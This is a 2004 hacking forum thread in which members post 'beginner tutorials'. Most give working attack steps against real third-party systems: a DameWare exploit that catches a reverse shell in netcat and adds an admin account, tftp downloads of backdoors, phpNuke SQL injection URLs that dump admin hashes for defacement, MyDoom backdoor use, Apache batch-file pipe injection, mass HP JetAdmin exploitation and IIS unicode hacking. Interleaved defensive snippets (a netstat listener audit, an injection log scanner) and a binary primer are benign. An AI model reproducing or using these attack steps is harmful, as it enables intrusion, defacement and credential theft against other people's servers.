Maybe you're just starting out and new to hacking & security. How about writing a mini tutorial every time you learn something new. This will help you consolidate your understanding and enable you to teach new members something so we all learn.
Look forward to reading them.
Train25
Feb 3 2004, 12:26 AM
I would have to agree. This would spread the knowledge and cover all members from the novice to advanced user.
Maybe something for the admins and mods to discuss??
sweetangel_4u62
Feb 5 2004, 12:07 AM
Hi... I'm new to all this... I would like to know where I could get a good "port listener" (in my b-f's words) so I can see if someone is hacking me, I guess....
w00dy
Feb 5 2004, 01:26 AM
CODE
netstat -ao
a = lists all ports, o = shows the PID so u know what app it is that is listening on that port. PS: why are u posting this to this thread?
You must be active in the forum and make some good posts then you'll be promoted.
forza
Feb 16 2004, 07:21 PM
Tutorial for beginners: DameWare Mini Remote Control v3.72 & v3.73 remote exploit
Tools:
* NetCat
* Autototof_dameware_3.72_3.73.rar (http://www.kyoshi.nl/files/autototof_dameware_3.72_3.73.rar)
* TFTP server
Open command prompt, go to the folder with nc.exe now give the follow command: nc -L -vv -p <port>
For example: C:\>nc -L -vv -p 4567 listening on [any] 4567 ...
Netcat is now listening and waiting to be changed in a reverse command line.
Go to your autototof_dameware_3.72_3.73 directory and start damwre.bat. (you can scan and hack) Here I wanna hack a dmware 3.73 machine so I choose 6.
Enter ip (hacked ip) 1**.1**.*.5
give me your ip 1**.1**.*.*
give me your port 4567 <port used in netcat>
give me variant winXP(0,1,2) 0
If all goes well, you get this screen:
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor
[Crpt] www.coromputer.net && undernet #coromputer
[+] Connecting to ***.***.*.5 ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Patched
Now you get in Netcat a prompt for the remote machine C:\windows\system32>
Now you can start moving files to the remote machine with tftp tftp.exe -i YOURIP get FILE c:\Winnt\system32\FILE And starting backdoor services or ...
Make your admin account net user USERNAME PASSWORD /add net localgroup administrators USERNAME /add
Enjoy Your Hack!
EDITED No IP address should be posted. Thanks
Qlimax
Feb 17 2004, 04:14 PM
hello everybody (: here is a tut on how to use echo. I don't know everything about echo but I know: if u want to use echo u need the FTP.EXE file on the box u try to hack. ok, we start: first u need to open a server on ur box. open a new folder (whatever u want, on whichever drive u want) and put there the files u want to upload. open a user with ur server app and home-dir the user on the folder u opened. now go to the cmd\shell\whatever u have and write the commands:
after u write the commands u see the remote box starting to download from ur box; after it's finished u can do whatever u want. I hope I helped u. Qlimax.
mrmoose²
Feb 17 2004, 10:42 PM
I have a question: how can I scan anon pubs like Grim's Ping but with SuperScanner 4.00? Can someone help?
DiabloPatch
Feb 18 2004, 04:52 PM
A nice site with some tuts I made (DiabloHorn) and also tuts from some other peeps, and a few tools. Hope you peeps enjoy.
hxxp://www.woodys-software.tk
Available tuts on the site:
- Escalating privileges on Windows 2000 & XP
- Escalating privileges on Windows 2000
- How to hack IIS 5.0 through WebDAV
- Netbios hacking
- Gathering info on remote host
- The Road To Becoming A Hacker
- Many ways to obtain an IP
- Serv-U Error 100
- Hacking Secured SQL
- File Transfer Methods
- SQL: Problems and Solutions
- Hacking msadc (NT IIS MDAC RDS Vulnerability)
- Hacking Basics Part 1
- Hacking Basics Part 2
- Hacking Basics Part 3
- Hacking Basics Part 4
- Hacking Basics Part 5
Todd
Feb 22 2004, 08:20 AM
when I do the DMW sometimes I can't get the hack (win98), so a friend of mine told me to make a slave.exe for a remote proggy. I echo-get that to the site too and install it; that way I get another access to the site to work from. That usually solves my prob.
just thought I would share that :-)
whiskah
Mar 5 2004, 03:24 AM
Defacing phpNuke sites using multiple SQL injection techniques. Although this is very old, I was surprised to see thousands of sites vulnerable, even security sites and some hacking sites using phpNuke..
TOOLS:
1. Google, browser
2. MD5 password cracker: Cain and Abel, Lepton's Crack, RainbowCrack, mdcrack
3. Wordlist
STEPS:
1. Google search strings: these are just examples (this is just how I did it), use your imagination..
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. go to the site, then copy-paste the strings that start with '&', so the query for the downloads module sample would be hxxp://phpnukesite/modules.php?name=Downloads&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
weblinks module sample would be hxxp://phpnukesite/modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
Sections module sample would be hxxp://phpnukesite/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
Reviews module sample would be hxxp://phpnukesite/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
3. If you cracked the admin hash then login thru http://phpnukesite/admin.php
4. Respect and don't damage too much, just inform them to patch
6. You will be amazed how many sites you can deface
7. Some alternative queries are listed below:
[DOWNLOADS MODULE] --admin,hash--- &d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
I hope everyone lets the admin know and does not deface the web site.
rockerx
Mar 5 2004, 09:59 PM
Hi, I wrote this today. The English translation is just for this board.
English
What do we want? - We want to set up a very simple webserver on the rooted server.
What do we need?
- hiderun.exe
- miniwebserver.exe (u better rename it)
- miniwebserver.ini
- some html files (optional)
Ok, first we create the ini file: open your favourite editor, type the following text and save it as miniwebserver.ini
Port=13373
Root=C:\
Listing=1
"Port" is self-explaining. "Root" is the directory where the server looks for the html files (needs to exist). "Listing": shows a directory listing if html files are missing. Options: 0 (disabled), 1 (enabled)
ok, now upload the files to the server into one and the same directory and execute the server using: hiderun miniwebserver.exe cfg=miniwebserver.ini
Now it's done! The server is up!
note: after a reboot the webserver will not start up automatically but you know how to solve this problem
rockerx
German
What does this txt describe? - How we set up a small, simple webserver on a hacked server
What do we need for it?
- hiderun.exe
- miniwebserver.exe (better rename it)
- miniwebserver.ini
- html files (optional)
Ok, first we write the ini file: type the following lines into your editor and save them as miniwebserver.ini
Port=13373
Root=C:\
Listing=1
"Port" is self-explanatory. "Root" is the directory where the server expects the html files. "Listing": shows the directory contents if no index.html is present. Options: 0 (disabled), 1 (enabled)
Good, now upload the files to the server into one directory and start the webserver as follows: hiderun miniwebserver.exe cfg=miniwebserver.ini
ok, the server is running now.
after a reboot the webserver will not be started automatically, but you know how to handle that
rockerx
rotem
Mar 19 2004, 02:09 PM
can someone explain me something about MyDoom? please tell me what tools I need and how do I send the packet to the host?
JohnAcres
Mar 20 2004, 06:33 PM
Hacking WebDav
I'm going to do this tutorial like a science lab because I like that format. I haven't really read around that much so I'm not sure if this has been posted before or not or if this is even needed.
Purpose: Get a shell on the host.
Tools/Materials: wb.exe (the WebDav exploit by kralor, www.coromputer.net) nc.exe (netcat)
Procedure:
1. Open up netcat: nc -L -vv -p 1434
2. Make a batfile for wb.exe to get all the paddings in order, to make it easier.
That's about it... not hard, not complicated, or really new, but I thought it might help someone out.
tweakz20
Mar 21 2004, 11:16 PM
people. this is for tutorials... not requesting tutorials...
some of these are nice for new talent, good job guys. about the one using echo... you can just use notepad or any word processor to make life way easier... but if you're in DOS or constructing a batch file, that's a very useful command.....
NeBoKaDnEzZaR
Mar 25 2004, 08:25 AM
Hei, thx a lot for the Web Server Tutorial. A really good idea to make it in 2 languages, respect. I also will make TUTs here when I've learned something new. Was a good idea.
Greez NeBo
TwitcH
Mar 25 2004, 10:06 AM
This tut is just a lil something I'm still working on, hope this helps.
Gathering Information On Your Target V1.6 An Unsecure Team Tutorial
-ContentS-
1: Gathering Basic Information on The Administrator
2: Gaining Your Target's IP Address
3: Finding out the Target's Operating System Type and The Services it is Running
4: Port Scanners Will Help You Uncover Those Holes...
4: Finding Exploits for these Services
ChapteR 1: Gathering Basic Information On the Administrator
Gathering information on the person that runs your target system might seem a bit silly, but believe me, it can help a damn lot when trying to gain access to the system. One example of this is cracking passwords, ie: you're trying to use a dictionary attack on his password hash using an English dictionary when in fact he is actually Japanese and so is his password. Another reason this can be very useful is that social engineers can get to know his/her habits/hobbies/interests and work their way into the system by tricking people he works with into giving you access. We'll start by visiting the admin's website; take note of the topic of the website, this can be a very big clue as to what the admin is interested in (and you could also find other less secure sites he might have a username and password on, to try and get his password which might also be the password to his e-mail/server). Also try and grab his e-mail address (even his e-mail addy's name could be a big clue as to what his password is). You can even try slapping his e-mail addy into msn and try to talk to him pretending to be someone he knows or someone interested in what his server is running (just try not to sound too suspicious). Once you know as much as you can about the admin, try doing a finger or whois on his website/e-mail (these tools are explained in the mini-tutorials sections on the unsecure site). I think that's about all you can do to find out about the admin (just remember exploiting/cracking isn't the only way into a server).
ChapteR 2: Gaining Your Targets IP Address
This is a very important but relatively easy part of gathering information on the target. You will need the target's IP address to use tools such as port scanners, exploits, sniffers blablabla... Getting it, as I said earlier, is a piece of piss; one easy way of doing this is nslookup: just go to your command line and type nslookup "inserthostname here" <(Without The Quotes!!) this should hopefully bring up the host's IP addy. BUT! this might not be the way into the server; you might need to hack the admin's personal computer, so you will need the admin's personal computer's IP addy, and getting this can be a bit harder. I can't think of any definite way of doing this but there are some tools that you can download that will let you get the IP address using MSN, ICQ and other programs that use a connection between the two computers.
Chapter 3: Port Scanners Will Help You Uncover Those Holes...
There are lots of different port scanners available for you today, some have millions of options others just do a simple TCP scan. This chapter will just tell you a little about the best ones available and where to get them from.
Nmap: Nmap can be found at http://www.insecure.org and is a Linux based port scanner (although there is a Windows port, I don't recommend it due to really slow scanning times). Nmap's best feature is its amount of scanning options, some of these are:
* Vanilla TCP connect() scanning,
* TCP SYN (half open) scanning,
* TCP FIN (stealth) scanning,
* TCP ftp proxy (bounce attack) scanning,
* SYN/FIN scanning using IP fragments (bypasses packet filters),
* UDP recvfrom() scanning,
* UDP raw ICMP port unreachable scanning,
* ICMP scanning (ping-sweep),
* Reverse-ident scanning, and
* OS Detection
as you can see that's quite a list and very very useful in any hacker's eyes.
GFI LanGuard Network Security Scanner: http://www.gfi.com This is a Windows based scanner with a nice easy to use GUI; this scanner will not only detect OS version, scan the ports and do port range scans, it also looks to see if the target has any security holes!! This lil bugger will scan their computer using the latest exploits/trojan ports and tell you if the target computer is exploitable. This can help a damn lot when gathering information on a target. Once the scanner has found an exploit, it will show you a link to the BugTraq listing for this exploit where you can possibly find out how to exploit this hole.
NetScan Tools Pro 2000: http://www.nwpsw.com This is a simpler version of a Windows GUI based port scanner, but this one has a shitload more options, things like finger, ping, traceroute, WhoIs, SMTP E-mail generator, NetBios Info Lookup and about 10 more... Only thing is this one is not free, you have to pay for it. (although I do think I saw this floating around DC++ )
ChapteR 4: Finding Exploits For The Services
This part is simple; everyone, no matter how dumb, should be able to find an exploit. Just try and find out the version of the service you want to exploit, open up google and search for "blabla 1.0 exploit" or summin along those lines. Find the exploits, compile, read the instructions and attack. I'll write up another tutorial on using some common exploits one day. (just vote for the tutorial you want at unsecure.khgamez.com) Well that just about wraps it up for Version 1 of this tutorial (yes I said version one, this thing will get updated and will go into the extreme details of everything I've mentioned in here) so while you're waiting for fuller explanations and techniques for gathering information on your target server, head over to unsecure.khgamez.com and fill them boards, post some tutorials and submit some news. Another way of finding new exploits is to sign yourself up to an exploit mailing list; these can be very helpful on difficult hacks because new exploits are appearing
Anyone wanting to be a part of the unsecure.khgamez.com team should send me an e-mail at illuminati_2600@hotmail.com thank you and happy hacking
migo
Mar 31 2004, 10:23 PM
wow!
binary_hashes
Apr 1 2004, 03:37 AM
hi all, I'm also new. I want to know the difference between the MS03-026 and MS03-036 vulnerabilities. pLeAse, I need some guidance
eXtiGy
Apr 3 2004, 11:15 AM
QUOTE
MD5 password cracker
Hello all, regarding this MD5 cracker, I always get stuck at "password size 6 scanning" for a very very long time, like 2 hrs or more; it didn't continue cracking after 2 hours+. What is the problem? Anyone knows? Or is the hash impossible to crack at all?
this is the hash by the way.. : 48b63ee26e7e0f115bfc627cd9b6c725
Jay
Apr 3 2004, 11:24 AM
eXtiGy. This looks like you are doing illegal things and then posting the hash in the main forum asking for help. This is a security forum and not a script kiddy forum.
Member suspended.
Cyberneo
Apr 16 2004, 03:06 AM
QUOTE (rotem @ Mar 19 2004, 02:09 PM)
cab someone explain me something about the MyDoom ? please tell me what tools i need and how do i send the packet to the host ?
Hello, this is my first post around here and hopefully there will be a lot more soon. Well, MyDoom it's not that big of a deal to get to; all u need to use MyDoom is a port scanner, the rsCRT.exe, a telnet prog like nc.exe and the prog to exploit the vuln itself called mykralor.exe.
1- so, first thing is first, u need to get the range u want to check for the doom vuln scanned, for which we'll use the port scanner, and set it to scan on port 3127.
2- After u get a list of results from the scan u open the rsCRT.exe, which will create us a remote shell that we can upload to the place ur testing for security issues. So just set the IP and port u want this program to bind the shell to and hit the create button.
3- Now we need to prepare to get a shell. Open nc.exe and set it to listen to any (nc.exe -l -vv -p PORT#). It will wait for an incoming connection from the place u uploaded the program created with rsCRT.exe to give you a shell.
4- Open mykralor.exe with your results from the scan and run it like this, ie. mykralor.exe Target_IP 3127 shell.exe *note* shell.exe should be in the same directory as mykralor.exe. This will start sending the packet to the provided hosts and if the host is infected u'll get a prompt dropped in ur nc.exe listening window.
To secure any site u find with this vuln u just need to upload a file called securemydoom.com, get in a cmd prompt and type securemydoom.com -NOC; with that, the program will start an autosearch in the site for infected files and will erase em from it and ur box will be cleaned from this nasty virus.
If u need this cleaner file just lemme know. I can send it anywhere or post it here. Hope this helps u and any1 else that needs info on the MyDoom virus.
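A defender's counterpart to w00dy's `netstat -ao` tip earlier in the thread and to the port-3127 listener this MyDoom post depends on: a small audit that parses `netstat -ao` output, groups listening ports by PID (the point of the `-o` column) and flags ports on a watchlist (3127 and 99 are the two backdoor ports named in this thread) or outside a local allowlist. This is an added example, not code from any poster; the netstat text is constructed and the allowlist values are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple

# Constructed sample of "netstat -ao" output on a Windows host (not captured anywhere).
# Port 13373 is the miniwebserver port from rockerx's post; 3127 and 99 are the
# backdoor ports named in the MyDoom and pubstro posts of this thread.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3127           0.0.0.0:0              LISTENING       1612
  TCP    0.0.0.0:99             0.0.0.0:0              LISTENING       2044
  TCP    0.0.0.0:13373          0.0.0.0:0              LISTENING       2044
  TCP    192.168.1.5:1054       192.168.1.1:80         ESTABLISHED     1200
  UDP    0.0.0.0:137            *:*                                    4
"""

# Ports this thread associates with backdoors (an assumption for the example, not a general IoC list).
WATCHLIST = {
    3127: "MyDoom backdoor listener (port named in the MyDoom post)",
    99: "ncx99 netcat backdoor (port named in the pubstro post)",
}


class Listener(NamedTuple):
    proto: str
    address: str
    port: int
    pid: int


# Proto, Local Address:Port, Foreign Address, optional State (UDP lines have none), PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def parse_listeners(netstat_text: str) -> List[Listener]:
    """Return TCP sockets in LISTENING state plus every UDP socket (UDP is always bound)."""
    listeners = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank, or a line this parser does not understand
        proto, address, port, state, pid = m.groups()
        if proto == "TCP" and state != "LISTENING":
            continue
        listeners.append(Listener(proto, address, int(port), int(pid)))
    return listeners


def ports_by_pid(listeners: List[Listener]) -> Dict[int, Set[int]]:
    """One process may own several ports; group them so each PID is checked once."""
    grouped: Dict[int, Set[int]] = defaultdict(set)
    for l in listeners:
        grouped[l.pid].add(l.port)
    return dict(grouped)


def audit(netstat_text: str, allowlist: Set[int]) -> List[Tuple[Listener, str]]:
    """Flag watchlisted ports first, then anything outside the host's expected-port allowlist."""
    findings = []
    for l in parse_listeners(netstat_text):
        if l.port in WATCHLIST:
            findings.append((l, "WATCHLIST: " + WATCHLIST[l.port]))
        elif l.port not in allowlist:
            # tasklist /fi "PID eq N" is the Windows way to name the owning process.
            findings.append((l, f'unexpected listener; identify with: tasklist /fi "PID eq {l.pid}"'))
    return findings


if __name__ == "__main__":
    for listener, reason in audit(SAMPLE_NETSTAT, allowlist={135, 445, 137}):
        print(f"{listener.proto} {listener.address}:{listener.port} pid={listener.pid}  {reason}")
```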
pink.frog
Apr 16 2004, 07:09 PM
Thanks for the MyDoom Tut. Great piece of work
TheRealGiant
Apr 17 2004, 11:20 AM
Not new, but might help someone.
Apache Win32 - 1.3.23 & 2.0.28 Hacking
What you need:
You don't need any tool to make the deface. This vulnerability can be exploited via a browser.
1. This vulnerability has been exploited on
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
When a request for a DOS batch file (.bat or.cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)
(a)To view the httpd.conf file residing in the /conf directory of the Apache installation, you must copy it into the virtual web root.
hxxp://www.target.com/cgi-bin/test-cgi.bat?|echo+Defaced bY YOU+>>+..\htdocs\index.html
This will append the string "Defaced bY YOU" to the index.html file residing in the virtual web root directory.
That's how this vulnerability can be exploited...
seeno
Apr 29 2004, 10:14 PM
For those who can't use their winmodems (Conexant chipsets). Did you install a Linux distro and find out you couldn't use your winmodem? Well, there's a solution for that now: go to Linuxant and download the right package for your kernel/modem (free version), install it and give it a try using kppp. kppp is a GUI version for those who want to connect quick and/or don't know how to configure pppd. You're limited to 14.4Kbps data with the free version so I would recommend you to buy the full version.
Spawn
May 2 2004, 03:10 PM
You can Download a lot of programming tuts here : Take a look, its a nice one
alright I'm gonna do a quick tutorial on how to hack and scan for HP Web JetAdmin.. the ways of my knowledge and experience; if anyone has any suggestions feel free to post em cause right now the scanning/checking is fairly crude.
alright well I'll start off with the scanning for HP Web JetAdmin. Sfind or scan500, whichever ur favorite scanner of that type is, and choose a range and scan for port 8000... fairly simple right... so if u were using sfind u'd do...
sfind 127.0.0.1 127.254.254.254 -p 8000
once u have that scan take scanline or whatever other banner scanner u want to use and banner scan the ips on port 8000, for scanline it goes like this
sl -bhpt 8000 -f portscan.txt -o bannerscan.txt
now you have the banner results... you want to find all the banners that have HP Web JetAdmin in them and copy all the ips to another txt file. once you have this txt file we can use notepad to (hopefully u didn't scan multiple A class ranges or this trick is kinda hard) turn these ips into sort of a masshacker/autohacker. Go to replace, put in the first number set in the range (example: if I scanned 127.9.0.1 to 127.60.254.254 I'd put in 127.) with the period at the end in the find dialog box... in the replace box put hp.pl plus the first number set with the period... so example (I put 127. in the find dialog, I put hp.pl 127. in the replace with dialog box).
save and close the file... rename it to a .bat, execute it in the folder with the exploit
it will go thru all the ips and try to hack em... once it gets to a windows box that it can hack it will ask you how u want to upload the files, f for ftp or t for tftp... choose ur preference, I've always done ftp cause I can't host a tftp server. it'll ask you for the username/password for the ftp or tftp server, the ip, the file path, and the file you want uploaded... fill out all these with what you want... for the backdoor on this I HIGHLY recommend using a reverse connect shell because it's not executed right away. open up ur netcat on the port that the victim is gonna connect back to and just wait for a while, there's no set time it'll connect back so just leave it open for a day or two.
easy as that... now for the more technical details about the exploit
the exploit is in perl so you can download ActivePerl, it's on the bottom of the perl2exe site I think, but it's fairly available; just use the perl script which is much more stable and much faster.
note: I haven't read this over so sorry for the poor writing that's prolly in here... I'll look it over eventually
tweakz20
May 8 2004, 01:09 AM
even though I'm in the specialist category now, this tut isn't supposed to be too grand... most everyone knows about it.. understanding BINARY!
Binary is the lowest level; it is a bunch of switches of ON and OFF and computers show this with 1 (on) and 0 (off). Now, for a while I had no clue what they were talking about with the powers of ten crap, so here's a different way to look at it.
Here's a number: 192 (which is an example of an IP 8-bit binary section). In binary: 11000000. Let's explain this.
1 - 0
2 - 0
4 - 0
8 - 0
16 - 0
32 - 0
64 - 1
128 - 1
( 128 + 64 = 192 )
OK, so what can you see from that table thing?
In binary, the highest bit is on the left, the lowest on the right.
The numbers' starting number is ONE
The numbers DOUBLE each time they give another digit
No number can be made 2 different ways
to elaborate on the last thing in the list: imagine the number... 2... OK? (let's not make this more complicated than it is).. well how would you do two when the only two numbers <= 2 are 1 and 2? you can't use 2 ones, you have to use one two.. simple if you think about it
Binary is a very simple concept once you get to understand it... if you're just starting out learning binary, hope this helped you
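A worked version of the place-value table above, added here as an example and not the poster's own code: it builds the post's table for any octet, checks the "no number can be made 2 different ways" claim for all 256 values, and goes one step beyond the post by applying the same bits to a full dotted-quad address and a prefix length (the addresses used are constructed).

```python
PLACE_VALUES = [128, 64, 32, 16, 8, 4, 2, 1]  # highest bit on the left, as the post says


def octet_to_bits(n: int) -> str:
    """Write 0..255 as eight bits by subtracting place values from the left."""
    if not 0 <= n <= 255:
        raise ValueError("an IP octet is one byte: 0..255")
    bits = []
    rest = n
    for value in PLACE_VALUES:
        if rest >= value:
            bits.append("1")
            rest -= value
        else:
            bits.append("0")
    return "".join(bits)


def bits_to_octet(bits: str) -> int:
    """Add up the place values whose bit is 1 (128 + 64 = 192 in the post)."""
    if len(bits) != 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected eight 0/1 characters")
    return sum(value for value, bit in zip(PLACE_VALUES, bits) if bit == "1")


def place_value_table(n: int):
    """The post's table for n: (place value, bit) pairs listed from 1 up to 128."""
    bits = octet_to_bits(n)
    return [(value, int(bit)) for value, bit in reversed(list(zip(PLACE_VALUES, bits)))]


def every_octet_has_one_spelling() -> bool:
    """'No number can be made 2 different ways': 256 values give 256 distinct strings,
    and each string converts back to the value it came from."""
    spellings = {octet_to_bits(n) for n in range(256)}
    round_trips = all(bits_to_octet(octet_to_bits(n)) == n for n in range(256))
    return len(spellings) == 256 and round_trips


def ip_to_bits(ip: str) -> str:
    """Dotted quad -> four 8-bit groups, e.g. 192.168.1.5 -> 11000000.10101000.00000001.00000101"""
    octets = [int(x) for x in ip.split(".")]
    if len(octets) != 4:
        raise ValueError("expected four octets")
    return ".".join(octet_to_bits(o) for o in octets)


def bits_to_ip(bits: str) -> str:
    return ".".join(str(bits_to_octet(group)) for group in bits.split("."))


def network_address(ip: str, prefix_len: int) -> str:
    """Keep the leftmost prefix_len bits of the 32-bit address and zero the rest
    (the same idea as a subnet mask, one step past what the post covers)."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length is 0..32")
    flat = ip_to_bits(ip).replace(".", "")
    masked = flat[:prefix_len] + "0" * (32 - prefix_len)
    return bits_to_ip(".".join(masked[i:i + 8] for i in range(0, 32, 8)))


if __name__ == "__main__":
    for value, bit in place_value_table(192):
        print(f"{value}- {bit}")
    print(ip_to_bits("192.168.1.5"), network_address("192.168.1.200", 26))
```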
Borgon
May 18 2004, 05:04 AM
Hi,
Can someone include more SQL injection tutorials? I have been doing some research on this topic and all I find are a few papers on exploiting easy login.asp form vulnerabilities, but nothing like a real application blindly, not knowing the database table structures etc.
thanks
manu
May 18 2004, 08:08 AM
QUOTE
You can Download a lot of programming tuts here : Take a look, its a nice one
Unfortunately I didn't get any tuts from that page u mentioned. Waste of time.
Manu
Opal
May 23 2004, 11:26 PM
Vulnerability in Apache for Win32 batch file processing - Remote command execution
=> Vendor: Apache group
=> Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
=> Severity: High, remote command execution and arbitrary file viewing.
=> Summary: Because of the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('|') character.
** IMPORTANT ** The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
=> Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('|') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
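A defender's log check for the two injection patterns this thread shows: whiskah's phpNuke `UNION SELECT` URLs and the Apache batch-file pipe request described in the advisory above. It decodes the request line the way cmd.exe or the database would have seen it, labels hits, and shows the hardening side (reject shell metacharacters in batch arguments outright). Added example, not code from any poster or from the Apache project; the log lines are constructed in Common Log Format with documentation-range addresses and the rules are assumptions, not Apache's own validation.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed Common Log Format lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Mar/2004:03:24:00 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Mar/2004:03:24:09 +0000] "GET /modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* HTTP/1.1" 200 2210',
    '198.51.100.3 - - [17/Apr/2004:11:20:00 +0000] "GET /cgi-bin/test-cgi.bat?name=value HTTP/1.0" 200 300',
    '198.51.100.3 - - [17/Apr/2004:11:20:05 +0000] "GET /cgi-bin/test-cgi.bat?%7Cdir+c:%5C HTTP/1.0" 200 1450',
    '198.51.100.3 - - [17/Apr/2004:11:21:00 +0000] "GET /index.html HTTP/1.0" 200 880',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I)   # UNION ... SELECT with little in between
SQL_COMMENT_RE = re.compile(r"--|/\*")                         # the trailing -- or /* the thread's URLs end with
BATCH_RE = re.compile(r"\.(?:bat|cmd)$", re.I)                 # the CGI types the advisory says cmd.exe runs
SHELL_META = frozenset("|&<>")                                 # cmd.exe metacharacters; '|' is the advisory's case


def decoded_request(line: str) -> Optional[Tuple[str, str]]:
    """Return (path, decoded query) for a log line, or None if it has no request field."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # unquote_plus turns %20 and '+' into spaces and %7C into '|': what the script actually received.
    return unquote_plus(parts.path), unquote_plus(parts.query)


def classify(line: str) -> List[str]:
    """Labels for one log line; an empty list means no rule matched."""
    req = decoded_request(line)
    if req is None:
        return []
    path, query = req
    labels = []
    if UNION_RE.search(query):
        labels.append("sqli-union")
    if SQL_COMMENT_RE.search(query):
        labels.append("sqli-comment")
    if BATCH_RE.search(path) and any(c in query for c in SHELL_META):
        labels.append("batch-pipe-rce")
    return labels


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(index, labels) for every line that matched at least one rule."""
    hits = []
    for i, line in enumerate(lines):
        labels = classify(line)
        if labels:
            hits.append((i, labels))
    return hits


def batch_argument_is_safe(arg: str) -> bool:
    """Hardening side: a batch CGI wrapper should reject metacharacters, not try to strip them."""
    return not any(c in arg for c in SHELL_META)


if __name__ == "__main__":
    for index, labels in scan(SAMPLE_LOG):
        print(index, ", ".join(labels), SAMPLE_LOG[index][:80])
```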
ShouiZen
May 25 2004, 03:51 PM
Yes, it's good software, the autotof_dameware_3.72_3.73. Yeah man, it's a good job.
Opal
Jun 1 2004, 09:23 AM
The How-To Hack IIS Servers For Pubstros: a tutorial about hacking using IIS exploits. This one goes for the people that ask for a tut to start hacking. If u wanna know more, research yourself.
Pub Hacking Tutorial
The How-To Hack IIS Servers For Pubstros (By GENERAL NEWBIE) March 20 ,2002
For Educational Use Only
Getting started is simple... let me warn you that what you're doing is illegal and dangerous. Now then, this tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone else's pub hahahahaha!
Now then the tools and knowledge you will need are as follows
Tools Required:
1. Serv-U FTP Server 4.0 works just fine but version 3.0 doesn't require an additional dll file
2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe)
3. Your brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit
4. Internet Explorer
5. Other things to try
Ok, let me start by saying this is for "Education Purposes" only and I take no responsibility for what you do
The Setup
Step 1: Install Serv-U AND download the already preconfigured ServUDaemon from me (recommended as I will be explaining from this)
The reason why I told you to download both is because the Serv-U version 4 that you download has an admin program, so you can make your own ini file after you understand everything I have in mine.
TFTPSuitePro Setup: Open TFTPSuitePro. When it asks u to register, hit Register then Cancel. You should have something that looks like this. Hit System->Setup; for Inbound Path File, hit Browse and pick the C:\FTP dir we made, and do the same for Outbound, then hit Ok. Now then, when it's time to upload files TFTP SERVER MUST BE RUNNING
Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for IIS servers and find one to hack
Here you will find tons of little programs that will assist you in hacking your server.
Step 4: FIND A VULNERABLE SERVER
Step 5: Start Making the Pub
Ok, I'm assuming you have a host that you can maybe get away with uploading files to.. and I say this because some networks are behind firewalls that don't allow TFTP to connect to an outside host and establish a connection. Thus even though you can use the unicode exploit on it to view all the files, it still doesn't mean you can upload files to it.. Plus some host administrators make it so that you can't write to the HD... GOOD LUCK THERE
Starting To THE HACK
FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!
The Right Side, you should be at a directory listing in Internet Explorer. The dir should look like this:
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+d ir+c:\ <----- This line will vary
